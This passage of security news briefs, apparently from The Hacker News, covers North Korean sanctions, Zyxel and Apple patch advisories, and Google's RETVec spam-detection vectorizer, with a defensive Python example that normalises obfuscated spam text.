The agency also identified Kang Kyong Il, Ri Sung Il, and Kang Phyong Guk for acting as weapons sales representatives; So Myong, Choe Un Hyok, and Jang Myong Chol for engaging in illicit financial transfers to procure material for North Korea's missile programs; and Choe Song Chol and Im Song Sun for running front companies involved in generating revenue by exporting skilled workers.

"The geographic breakdown of North Korean threat groups' targeting in the cryptocurrency industry [follows a multi-pronged approach], where Kimsuky has been seen targeting the cryptocurrency industry in South Korea, and Lazarus Group has a more global presence in their cryptocurrency targeting operations," Recorded Future said in a new report published this week.


Zyxel Releases Patches to Fix 15 Flaws in NAS, Firewall, and AP Devices
1.12.23  Vulnerability  The Hacker News

Zyxel has released patches to address 15 security issues impacting network-attached storage (NAS), firewall, and access point (AP) devices, including three critical flaws that could lead to authentication bypass and command injection.

The three vulnerabilities are listed below -

CVE-2023-35138 (CVSS score: 9.8) - A command injection vulnerability that could allow an unauthenticated attacker to execute some operating system commands by sending a crafted HTTP POST request.
CVE-2023-4473 (CVSS score: 9.8) - A command injection vulnerability in the web server that could allow an unauthenticated attacker to execute some operating system commands by sending a crafted URL to a vulnerable device.
CVE-2023-4474 (CVSS score: 9.8) - An improper neutralization of special elements vulnerability that could allow an unauthenticated attacker to execute some operating system commands by sending a crafted URL to a vulnerable device.
Also patched by Zyxel are three high-severity flaws (CVE-2023-35137, CVE-2023-37927, and CVE-2023-37928) that, if successfully exploited, could allow attackers to obtain system information and execute arbitrary commands. It's worth noting that both CVE-2023-37927 and CVE-2023-37928 require authentication.

The flaws impact the following models and versions -

NAS326 - versions V5.21(AAZF.14)C0 and earlier (Patched in V5.21(AAZF.15)C0)
NAS542 - versions V5.21(ABAG.11)C0 and earlier (Patched in V5.21(ABAG.12)C0)
The advisory comes days after the Taiwanese networking vendor shipped fixes for nine flaws in select firewall and access point (AP) versions, some of which could be weaponized to access system files and administrator logs, as well as cause a denial-of-service (DoS) condition.

With Zyxel devices often exploited by threat actors, it's highly recommended that users apply the latest updates to mitigate potential threats.


Zero-Day Alert: Apple Rolls Out iOS, macOS, and Safari Patches for 2 Actively Exploited Flaws
1.12.23  OS  The Hacker News

Apple has released software updates for iOS, iPadOS, macOS, and Safari web browser to address two security flaws that it said have come under active exploitation in the wild on older versions of its software.

The vulnerabilities, both of which reside in the WebKit web browser engine, are described below -

CVE-2023-42916 - An out-of-bounds read issue that could be exploited to leak sensitive information when processing web content.
CVE-2023-42917 - A memory corruption bug that could result in arbitrary code execution when processing web content.
Apple said it's aware of reports that the shortcomings have been exploited "against versions of iOS before iOS 16.7.1," which was released on October 10, 2023. Clément Lecigne of Google's Threat Analysis Group (TAG) has been credited with discovering and reporting the twin flaws.

The iPhone maker did not provide additional information regarding ongoing exploitation, but previously disclosed zero-days in iOS have been used to deliver mercenary spyware targeting high-risk individuals, such as activists, dissidents, journalists, and politicians.

It's worth pointing out here that every third-party web browser available for iOS and iPadOS, including Google Chrome, Mozilla Firefox, Microsoft Edge, and others, is powered by the WebKit rendering engine due to restrictions imposed by Apple, making it a lucrative and broad attack surface.

The updates are available for the following devices and operating systems -

iOS 17.1.2 and iPadOS 17.1.2 - iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later
macOS Sonoma 14.1.2 - Macs running macOS Sonoma
Safari 17.1.2 - Macs running macOS Monterey and macOS Ventura
With the latest security fixes, Apple has remediated as many as 19 actively exploited zero-days since the start of 2023. It also comes days after Google shipped fixes for a high-severity flaw in Chrome (CVE-2023-6345) that has also come under real-world attacks, making it the seventh zero-day to be patched by the company this year.


Google Unveils RETVec - Gmail's New Defense Against Spam and Malicious Emails
1.12.23  Safety  The Hacker News


Google has revealed a new multilingual text vectorizer called RETVec (short for Resilient and Efficient Text Vectorizer) to help detect potentially harmful content such as spam and malicious emails in Gmail.

"RETVec is trained to be resilient against character-level manipulations including insertion, deletion, typos, homoglyphs, LEET substitution, and more," according to the project's description on GitHub.

"The RETVec model is trained on top of a novel character encoder which can encode all UTF-8 characters and words efficiently."

While huge platforms like Gmail and YouTube rely on text classification models to spot phishing attacks, inappropriate comments, and scams, threat actors are known to devise counter-strategies to bypass these defense measures.

They have been observed resorting to adversarial text manipulations, which range from the use of homoglyphs to keyword stuffing to invisible characters.
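The manipulations listed above (homoglyphs, LEET substitution, invisible characters) defeat a classifier that looks up whole words, which is the weakness RETVec's character-level encoder is built to resist. The following added example is a toy normaliser written for this article, not RETVec's own encoder: it shows the same constructed message failing a plain keyword lookup and matching once the character-level tricks are undone. The confusable table, LEET map and spam vocabulary are small assumed subsets.

```python
"""Toy illustration of why word-level matching breaks under character-level
manipulation and how a character-level normalisation recovers. Not RETVec."""
import re
import unicodedata

# Cyrillic letters that render like Latin ones (assumed subset of the Unicode
# confusables list; a production normaliser would use the full list)
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u0456": "i",
}
# Common LEET substitutions; "1" is ambiguous (l or i), a real system would
# expand both readings rather than commit to one
LEET = {"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t",
        "@": "a", "$": "s", "|": "l"}
ZERO_WIDTH = re.compile("[\u200b\u200c\u200d\u2060\ufeff\u00ad]")


def normalize(text):
    """Undo the character-level tricks so that word-level matching works again."""
    text = ZERO_WIDTH.sub("", text)                 # invisible characters
    text = unicodedata.normalize("NFKC", text)      # fullwidth forms, ligatures
    text = text.lower()
    text = "".join(CONFUSABLES.get(ch, ch) for ch in text)

    def deleet(match):
        token = match.group(0)
        # only de-LEET tokens that contain letters, so "3 items" keeps its digit
        if not any(ch.isalpha() for ch in token):
            return token
        return "".join(LEET.get(ch, ch) for ch in token)

    return re.sub(r"\S+", deleet, text)


SPAM_TERMS = {"free", "money", "password", "click", "verify"}   # assumed vocabulary


def keyword_hits(text, vocab=SPAM_TERMS, normalise=True):
    """Vocabulary terms present as whole words, with or without normalisation."""
    prepared = normalize(text) if normalise else text.lower()
    words = set(re.findall(r"[a-z]+", prepared))
    return sorted(term for term in vocab if term in words)


# Constructed sample: Cyrillic "е" in "free", LEET digits, a zero-width space
# inside "click" and symbol substitutions in "password"
SAMPLE = "Fr\u0435\u0435 m0n3y! cl\u200bick to v3rify your p@$$w0rd"

if __name__ == "__main__":
    print("plain lookup:     ", keyword_hits(SAMPLE, normalise=False))
    print("normalised lookup:", keyword_hits(SAMPLE))
```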

RETVec, which works on over 100 languages out-of-the-box, aims to help build more resilient and efficient server-side and on-device text classifiers, while also being more robust and computationally less expensive.

Vectorization is a methodology in natural language processing (NLP) to map words or phrases from vocabulary to a corresponding numerical representation in order to perform further analysis, such as sentiment analysis, text classification, and named entity recognition.

"Due to its novel architecture, RETVec works out-of-the-box on every language and all UTF-8 characters without the need for text preprocessing, making it the ideal candidate for on-device, web, and large-scale text classification deployments," Google's Elie Bursztein and Marina Zhang noted.

The tech giant said the integration of the vectorizer to Gmail improved the spam detection rate over the baseline by 38% and reduced the false positive rate by 19.4%. It also lowered the Tensor Processing Unit (TPU) usage of the model by 83%.

"Models trained with RETVec exhibit faster inference speed due to its compact representation. Having smaller models reduces computational costs and decreases latency, which is critical for large-scale applications and on-device models," Bursztein and Zhang added.